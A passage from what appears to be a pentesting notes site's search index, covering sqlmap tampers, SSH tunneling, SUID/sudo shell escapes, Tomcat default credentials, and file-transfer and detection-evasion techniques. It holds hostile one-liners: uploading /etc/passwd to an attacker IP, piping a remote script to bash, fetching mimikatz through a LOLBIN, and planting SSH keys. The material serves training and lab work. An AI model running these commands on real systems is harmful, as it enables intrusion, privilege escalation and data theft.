    ","tags":["pentesting"]},{"location":"sqlmap/#tampers","title":"Tampers","text":"
    sqlmap -r request.txt --tamper=space2comment\n# space2comment: changes whitespace to /**/\n
    • apostrophemask.py: Replaces apostrophe character with its UTF-8 full width counterpart
    • apostrophenullencode.py: Replaces apostrophe character with its illegal double unicode counterpart
    • appendnullbyte.py: Appends encoded NULL byte character at the end of payload
    • base64encode.py: Base64-encodes all characters in a given payload
    • between.py: Replaces greater-than operator ('>') with 'NOT BETWEEN 0 AND #'
    • bluecoat.py: Replaces space character after SQL statement with a valid random blank character, then replaces character = with LIKE operator
    • chardoubleencode.py: Double url-encodes all characters in a given payload (not processing already encoded)
    • commalesslimit.py: Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
    • commalessmid.py: Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
    • concat2concatws.py: Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
    • charencode.py: Url-encodes all characters in a given payload (not processing already encoded)
    • charunicodeencode.py: Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"%u0022\"
    • charunicodeescape.py: Unicode-escapes non-encoded characters in a given payload (not processing already encoded). \"\\u0022\"
    • equaltolike.py: Replaces all occurrences of operator equal ('=') with operator 'LIKE'
    • escapequotes.py: Slash-escapes quotes (' and \")
    • greatest.py: Replaces greater-than operator ('>') with 'GREATEST' counterpart
    • halfversionedmorekeywords.py: Adds versioned MySQL comment before each keyword
    • ifnull2ifisnull.py: Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
    • modsecurityversioned.py: Embraces complete query with versioned comment
    • modsecurityzeroversioned.py: Embraces complete query with zero-versioned comment
    • multiplespaces.py: Adds multiple spaces around SQL keywords
    • nonrecursivereplacement.py: Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(\"SELECT\", \"\")) filters
    • percentage.py: Adds a percentage sign ('%') in front of each character
    • overlongutf8.py: Converts all characters in a given payload (not processing already encoded)
    • randomcase.py: Replaces each keyword character with random case value
    • randomcomments.py: Adds random comments to SQL keywords
    • securesphere.py: Appends special crafted string
    • sp_password.py: Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
    • space2comment.py: Replaces space character (' ') with comments
    • space2dash.py: Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\\n')
    • space2hash.py: Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n')
    • space2morehash.py: Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n')
    • space2mssqlblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
    • space2mssqlhash.py: Replaces space character (' ') with a pound character ('#') followed by a new line ('\\n')
    • space2mysqlblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
    • space2mysqldash.py: Replaces space character (' ') with a dash comment ('--') followed by a new line ('\\n')
    • space2plus.py: Replaces space character (' ') with plus ('+')
    • space2randomblank.py: Replaces space character (' ') with a random blank character from a valid set of alternate characters
    • symboliclogical.py: Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
    • unionalltounion.py: Replaces UNION ALL SELECT with UNION SELECT
    • unmagicquotes.py: Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
    • uppercase.py: Replaces each keyword character with upper case value 'INSERT'
    • varnish.py: Appends a HTTP header 'X-originating-IP'
    • versionedkeywords.py: Encloses each non-function keyword with versioned MySQL comment
    • versionedmorekeywords.py: Encloses each keyword with versioned MySQL comment
    • xforwardedfor.py: Appends a fake HTTP header 'X-Forwarded-For'","tags":["pentesting"]},{"location":"sqlplus/","title":"sqlplus - To connect and manage the Oracle RDBMS","text":"

    SQL Plus is a command-line tool that provides access to the Oracle RDBMS. It enables you to:

    • Enter SQLPlus commands to configure the SQLPlus environment.
    • Start up and shut down an Oracle database.
    • Connect to an Oracle database.
    • Enter and execute SQL commands and PL/SQL blocks.
    • Format and print query results.
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#connect-to-oracle-database","title":"Connect to Oracle database","text":"

    If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

    sqlplus <username>/<password>@$ip/XE;\n

    In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

    sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#basic-commands","title":"Basic commands","text":"

    All commands from Oracle's documentation.

    # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n
    ","tags":["oracle tns","port 1521","tools"]},{"location":"sqsh/","title":"sqsh","text":"","tags":["database","cheat sheet","mssql"]},{"location":"sqsh/#installation","title":"Installation","text":"

    Pre-installed in Kali. Used to interact with MSSQL (Microsoft SQL Server) from Linux.

     # Connect to mssql server\n sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n

    When connected to MSSQL, commands are only executed after you enter the GO command, as in the sketch below.
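    A minimal interaction sketch:

    1> SELECT name FROM master.dbo.sysdatabases\n2> GO\n# Nothing is sent to the server until GO is entered; it then executes the batched commands above\n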

    ","tags":["database","cheat sheet","mssql"]},{"location":"ssh-audit/","title":"ssh-audit","text":""},{"location":"ssh-audit/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/jtesta/ssh-audit.

    git clone https://github.com/jtesta/ssh-audit.git \n
    "},{"location":"ssh-audit/#basic-usage","title":"Basic usage","text":"
    ./ssh-audit.py $ip\n
    "},{"location":"ssh-for-github/","title":"SSH for github","text":""},{"location":"ssh-for-github/#how-to-configure-multiple-two-or-more-deploy-keys-for-different-private-github-repositories-on-the-same-computer-without-using-ssh-agent","title":"How to configure multiple two or more deploy keys for different private github repositories on the same computer without using ssh-agent","text":"

    Let's say I want to have SSH key A for repo1 and SSH key B for repo2.

    1. Create an SSH key pair for each repository
    ssh-keygen -t ed25519 -C \"your_email@example.com\"\n# ed25519 is the algorithm\n

    For the second key and the subsequent ones, you will need to specify a different file name.

    • Private key should have permissions set to 600.
    • .ssh folder should have permissions set to 700.

    2. Add your SSH keys to the ssh-agent. In my case:

    # start the ssh-agent in the background\neval \"$(ssh-agent -s)\"\n\n# add your ssh private key to the ssh-agent.\nssh-add ~/.ssh/id_ed25519\n
    3. Add your SSH public keys as deploy keys in the Settings tab of repo1 and repo2.

    4. Edit the .git/config file in both repositories.

    # For repo1\n[remote \"origin\"]\n        url = \"ssh://git@repo1.github.com:username/repo1.git\"\n\n# For repo2\n[remote \"origin\"]\n        url = \"ssh://git@repo2.github.com:username/repo2.git\"\n
    5. For each repo, set name and email
    # navigate to your repo1\ngit config user.name \"yourName1\"\ngit config user.email \"email1@domain.com\"\n\n# navigate to your repo2\ngit config user.name \"name2\"\ngit config user.email \"email2@domain.com\"\n
    6. Create a config file in .ssh to manage keys:
    # Default github account: username1\nHost github.com/username1\n   HostName github.com\n   IdentityFile ~/.ssh/username1_private_key\n   IdentitiesOnly yes\n\n# Other github account: username2\nHost github.com/username2\n   HostName github.com\n   IdentityFile ~/.ssh/username2_private_key\n   IdentitiesOnly yes\n
    7. Make sure you don't have all credentials cached in your ssh agent
    ssh-add -D\n
    8. Add new credentials to your ssh agent
    ssh-add ~/.ssh/username1_private_key\nssh-add ~/.ssh/username2_private_key\n
    9. See added keys
    ssh-add -l\n
    10. Test your connection
    ssh -T git@github.com\n
    "},{"location":"ssh-keys/","title":"SSH keys","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#read-access-to-ssh","title":"Read access to .ssh","text":"

    Having read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and we can copy it to our machine and use the -i flag to log in with it:

    vim id_rsa\nchmod 600 id_rsa\n# If the private key has lax permissions (i.e., readable by other users), the SSH client will refuse to use it.\nssh user@10.10.10.10 -i id_rsa\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#write-access-to-ssh","title":"Write access to .ssh","text":"

    Having write access over the .ssh directory for a specific user, we may place our public key in /home/user/.ssh/authorized_keys.

    But for this we need to have gained access first as that user. With this technique we obtain ssh access to the machine.

    # Generating a public private rsa key pair\nssh-keygen -f key\n

    This will give us two files:\u00a0key\u00a0(which we will use with\u00a0ssh -i) and\u00a0key.pub, which we will copy to the remote machine.

    Let us copy\u00a0key.pub, then on the remote machine, we will add it into\u00a0/root/.ssh/authorized_keys:
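    A sketch of those two steps (the key material and IP are placeholders):

    # On the remote machine, append our public key\necho 'ssh-rsa AAAAB3Nz...' >> /root/.ssh/authorized_keys\n\n# Back on our machine, log in with the matching private key\nssh root@10.10.10.10 -i key\n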

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-tunneling/","title":"ssh tunneling","text":"


    "},{"location":"ssh-tunneling/#ssh-tunneling","title":"SSH tunneling","text":""},{"location":"ssh-tunneling/#local-port-forwarding","title":"Local port forwarding","text":"

    In this example we will use this tunneling as a way to access locally to a remote postgresql service:

    1. In the attacking machine:
    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client tunnels the connection through the SSH session and forwards it to port 5432 on the remote server. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from a local port of our choosing, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n
    1. In another terminal in the attacking machine:
    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
    "},{"location":"ssh-tunneling/#dynamic-port-forwarding","title":"Dynamic Port Forwarding","text":"

    Unlike local port forwarding and remote port forwarding, which use a specific local and remote port (earlier we used 1234 and 5432, for instance), dynamic port forwarding uses a single local port and dynamically assigns remote ports for each connection.

    To use dynamic port forwarding with SSH, use the ssh command with the -D option followed by the local port. For example, the following command opens a SOCKS proxy on local port 1234; the destination host and port of each connection are then decided dynamically by the client:

    ssh UserNameInTheAttackedMachine@IPOfAttackedMachine -D 1234 \n# Optional flags:\n# -f sends the command to the shell's background right before executing it remotely\n# -N tells SSH not to execute any commands remotely\n

    As you can see, this time around we specify a single local port to which we will direct all the traffic needing forwarding.

    If we now try running the same psql command as before, we will get an error. That is because this time around we did not specify a target port for our traffic to be directed to, meaning psql just sends traffic into the established local socket on port 1234 but never reaches the PostgreSQL service on the target machine. To make use of dynamic port forwarding, a tool such as proxychains is especially useful.

    In summary, and as the name implies, proxychains can be used to tunnel a connection through multiple proxies; a use case for this could be increasing anonymity, as the origin of a connection would be significantly more difficult to trace.

    In our case, we would only tunnel through one such \"proxy\": the target machine. The tool is pre-installed on most pentesting distributions (such as ParrotOS and Kali Linux) and is highly customisable, featuring an array of strategies for tunneling, which can be configured in its configuration file /etc/proxychains4.conf.

    The minimal changes that we have to make to the file for proxychains to work in our current use case are:

    1. Ensure that strict_chain is not commented out; ( dynamic_chain and random_chain should be commented out)
    2. At the very bottom of the file, under [ProxyList], we specify the socks5 (or socks4 ) host and port that we used for our tunnel

    In our case, it would look something like this, as our tunnel is listening at localhost:1234.

    [ProxyList]\n# add proxy here ...\n# meanwile\n# defaults set to \"tor\"\n#socks4 127.0.0.1 9050\nsocks5 127.0.0.1 1234\n

    Having configured proxychains correctly, we can now connect to the PostgreSQL service on the target, as if we were on the target machine ourselves! This is done by prefixing whatever command we want to run with proxychains:

    proxychains psql -U NameOfUserOfAttackedMachine -h localhost -p 5432\n
    "},{"location":"sshpass/","title":"sshpass - A program to pass passwords in the command line to ssh","text":"

    sshpass is a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process.

    ","tags":["tools"]},{"location":"sshpass/#installation","title":"Installation","text":"
    sudo apt install sshpass\n
    ","tags":["tools"]},{"location":"sshpass/#usage","title":"Usage","text":"
    sshpass -p 'thepasswordisthis' ssh user@IP\n
    ","tags":["tools"]},{"location":"sslyze/","title":"sslyze - A tool for scanning certificates","text":"

    Analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.).

    ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#installation","title":"Installation","text":"

    Preinstalled in Kali.

    Download it from: https://github.com/nabla-c0d3/sslyze.

    ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#basic-usage","title":"Basic usage","text":"
    sslyze --certinfo <DOMAIN>\n

    To avoid false positives regarding hostname validation, use the domain name (not the IP).

    ","tags":["pentesting","web pentesting"]},{"location":"sublist3r/","title":"sublist3r - A subdomain enumerating tool","text":"

    Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. It also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. It is easily blocked by Google.

    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#installation","title":"Installation","text":"
    git clone https://github.com/aboul3la/Sublist3r\ncd Sublist3r\nsudo pip install -r requirements.txt\n
    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#usage","title":"Usage","text":"

    From sublist3r directory:

    python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
    ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"suid-binaries/","title":"Suid binaries","text":"

    Resources: https://gtfobins.github.io/ contains a list of commands and how they can be exploited through \"sudo\".

    The Windows equivalent of SUID binaries would be LOLBAS.

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#most-used-by-me","title":"Most used (by me)","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#find","title":"find","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell","title":"Shell","text":"

    It can be used to break out from restricted environments by spawning an interactive system shell.

    find . -exec /bin/sh \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#suid","title":"SUID","text":"

    If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

    This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

    sudo install -m =xs $(which find) .\n\n./find . -exec /bin/sh -p \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo","title":"Sudo","text":"

    If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo find . -exec /bin/sh \\; -quit\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#vi","title":"vi","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell_1","title":"Shell","text":"

    It can be used to break out from restricted environments by spawning an interactive system shell.

    #one way\nvi -c ':!/bin/sh' /dev/null\n\n# another way\nvi\n:set shell=/bin/sh\n:shell\n
    Used at HTB machine Vaccine.

    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_1","title":"Sudo","text":"

    If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo vi -c ':!/bin/sh' /dev/null\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#php","title":"php","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_2","title":"Sudo","text":"

    If the binary is allowed to run as superuser by\u00a0sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    • CMD=\"/bin/sh\" sudo php -r \"system('$CMD');\"
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"sys-internals-suite/","title":"SysInternals Suite","text":"

    To download: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#tpcview","title":"TPCView","text":"

    An application that allows you to see incoming and outgoing network connections associated with the applications that own them.

    In the course \"Mastering Thick Application Pentesting\" this is really helpfil to check the conections of the vulnerable applicaiton DVTA.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#process-monitor","title":"Process Monitor","text":"

    This tool helps us understand file system changes and what is being accessed in the file system.

    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#strings","title":"Strings","text":"

    It's similar to the \"strings\" command in bash. It displays all the human-readable strings in a binary. Usage:

    strings.exe <binaryFile>\n
    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#sigcheck","title":"Sigcheck","text":"

    Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains.

    .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n
    ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#psexec","title":"PsExec","text":"

    PsExec\u00a0is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.
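    A typical invocation looks like this (hostname and credentials are placeholders):

    .\\PsExec.exe -accepteula \\\\TARGET -u DOMAIN\\user -p Password123 cmd.exe\n# Spawns an interactive cmd.exe on TARGET via the ADMIN$ share\n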

    ","tags":["windows","thick applications"]},{"location":"tcpdump/","title":"tcpdump - A\u00a0command-line packet analyzer","text":"

    It dumps all TCP connections from a .pcap file. tcpdump also prints out a description of the contents of packets on a network interface that match a Boolean filter expression.

    ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#installation","title":"Installation","text":"

    https://www.tcpdump.org/

    ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#usage","title":"Usage","text":"
    tcpdump -nntttAr <nameOfFile.pcap> \n\n# Exit after receiving count packets.\n-c count\n\n# Save the packet data to a file for later analysis\n-w \n\n# Read  from  a saved  packet  file\n-r\n\n# Print out all captured packages\n-A\n
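    For example (interface name and filter are illustrative), capturing only HTTPS traffic and reading it back:

    # Live capture with a Boolean filter expression\ntcpdump -i eth0 -w capture.pcap 'tcp port 443'\n\n# Read the saved capture back without name resolution\ntcpdump -nn -r capture.pcap\n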
    ","tags":["pentesting","reconnaissance"]},{"location":"the-harvester/","title":"The Harvester - A tool for pasive and active reconnaissance","text":"

    The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

    Automate the modules we want to launch:

    1. Create a list of sources, one per line, sources.txt.

    2. Execute:

     cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

    3. When the process finishes, extract all the subdomains found and sort them:

    cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

    4. Merge all the passive reconnaissance files:

    cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\ncat facebook.com_subdomains_passive.txt | wc -l\n
    ","tags":["pentesting","reconnaissance","tools"]},{"location":"tmux/","title":"Tmux - A terminal multiplexer","text":"","tags":["pentesting","terminal","shells"]},{"location":"tmux/#installation","title":"Installation","text":"
    sudo apt install tmux -y\n
    ","tags":["pentesting","terminal","shells"]},{"location":"tmux/#basic-usage","title":"Basic usage","text":"

    start new:

    tmux\n

    start new with session name:

    tmux new -s myname\n

    attach:

    tmux a  #  (or at, or attach)\n

    attach to named:

    tmux a -t myname\n

    list sessions:

    tmux ls\n

    kill session:

    tmux kill-session -t myname\n

    Kill all the tmux sessions:

    tmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill\n

    In tmux, hit the prefix ctrl+b (my modified prefix is ctrl+a) and then:

    List all shortcuts:
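    # After the prefix (Ctrl-b by default), press ? to list all key bindings\nCtrl-b ?\n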

    ","tags":["pentesting","terminal","shells"]},{"location":"tomcat-pentesting/","title":"Pentesting tomcat","text":"

    Usually found on port 8080.

    Default credentials:

    admin:admin\ntomcat:tomcat\nadmin:<NOTHING>\nadmin:s3cr3t\ntomcat:s3cr3t\nadmin:tomcat\ntomcat:tomca\n

    Dictionaries:

    ","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#directory-enumeration","title":"Directory enumeration","text":"","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#brute-force","title":"Brute force","text":"
    hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html \n
    ","tags":["web pentesting","techniques"]},{"location":"transferring-files-evading-detection/","title":"Evading detection in file transfers","text":"","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#changing-user-agent","title":"Changing User Agent","text":"

    Request with Invoke-WebRequest and Chrome User agent

    Listing user agents:

    [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label=\"User Agent\";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl\n
    Name       : InternetExplorer\nUser Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)\n\nName       : FireFox\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0\n\nName       : Chrome\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0\n             Safari/534.6\n\nName       : Opera\nUser Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1\n\nName       : Safari\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0\n             Safari/533.16\n

    Using Chrome User Agent:

    Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile \"C:\\Users\\Public\\nc.exe\"\n
    nc -lvnp 80\n
    ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#lolbas-gtfobins","title":"LOLBAS / GTFOBins","text":"

    Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence. In this case, an option may be to use a \"LOLBIN\" (living off the land binary), also known as a \"misplaced trust binary.\" An example LOLBIN is the Intel Graphics Driver for Windows 10 (GfxDownloadWrapper.exe), which is installed on some systems and contains functionality to download configuration files periodically. This download functionality can be invoked as follows:

    GfxDownloadWrapper.exe \"http://10.10.10.132/mimikatz.exe\" \"C:\\Temp\\nc.exe\"\n

    Such a binary might be permitted to run by application whitelisting and be excluded from alerting.

    ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/","title":"Transferring files with code","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python","title":"Python","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python2-download","title":"python2 Download","text":"
    python2.7 -c 'import urllib;urllib.urlretrieve (\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python-3-download","title":"Python 3 - Download","text":"
    python3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#upload-operations-using-python3","title":"Upload Operations using Python3","text":"

    uploadserver

    # Start the Python uploadserver module\npython3 -m uploadserver \n\n# Uploading a file using a Python one-liner\npython3 -c 'import requests;requests.post(\"http://192.168.49.128:8000/upload\",files={\"files\":open(\"/etc/passwd\",\"rb\")})'\n

    (Credentials used in the exercise: htb-student / HTB_@cademy_stdnt!)

    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php","title":"PHP","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-file_get_contents","title":"PHP Download with File_get_contents()","text":"
    # PHP file_get_contents() module to download content from a website combined with the file_put_contents() module to save the file into a directory. PHP can be used to run one-liners from an operating system command line using the option -r.\nphp -r '$file = file_get_contents(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); file_put_contents(\"LinEnum.sh\",$file);'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-fopen","title":"PHP Download with Fopen()","text":"
    php -r 'const BUFFER = 1024; $fremote = \nfopen(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"rb\"); $flocal = fopen(\"LinEnum.sh\", \"wb\"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-a-file-and-pipe-it-to-bash","title":"PHP Download a File and Pipe it to Bash","text":"
    php -r '$lines = @file(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); foreach ($lines as $line_num => $line) { echo $line; }' | bash\n# The URL can be used as a filename with the @file function if the fopen wrappers have been enabled. \n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#ruby","title":"Ruby","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file","title":"Download a File","text":"
    ruby -e 'require \"net/http\"; File.write(\"LinEnum.sh\", Net::HTTP.get(URI.parse(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\")))'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#perl","title":"Perl","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file_1","title":"Download a File","text":"
    perl -e 'use LWP::Simple; getstore(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\");'\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#javascript","title":"JavaScript","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-with-wgetjs","title":"Download a file with wget.js","text":"

    wget.js content:

    var WinHttpReq = new ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");\nWinHttpReq.Open(\"GET\", WScript.Arguments(0), /*async=*/false);\nWinHttpReq.Send();\nBinStream = new ActiveXObject(\"ADODB.Stream\");\nBinStream.Type = 1;\nBinStream.Open();\nBinStream.Write(WinHttpReq.ResponseBody);\nBinStream.SaveToFile(WScript.Arguments(1));\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-using-javascript-and-cscriptexe","title":"Download a File Using JavaScript and cscript.exe","text":"

    cscript.exe is the Console Based Script Host from Microsoft Corporation, part of Microsoft (r) Windows Script Host.

    cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#vbscript","title":"VBScript","text":"

    VBScript (\"Microsoft Visual Basic Scripting Edition\") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.

    We'll create a file called wget.vbs and save the following content:

    dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", WScript.Arguments.Item(0), False\nxHttp.Send\n\nwith bStrm\n    .type = 1\n    .open\n    .write xHttp.responseBody\n    .savetofile WScript.Arguments.Item(1), 2\nend with\n

    Now, download a file using VBScript and cscript.exe:

    cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#netcat","title":"Netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#printing-information-on-screen","title":"Printing information on screen","text":"

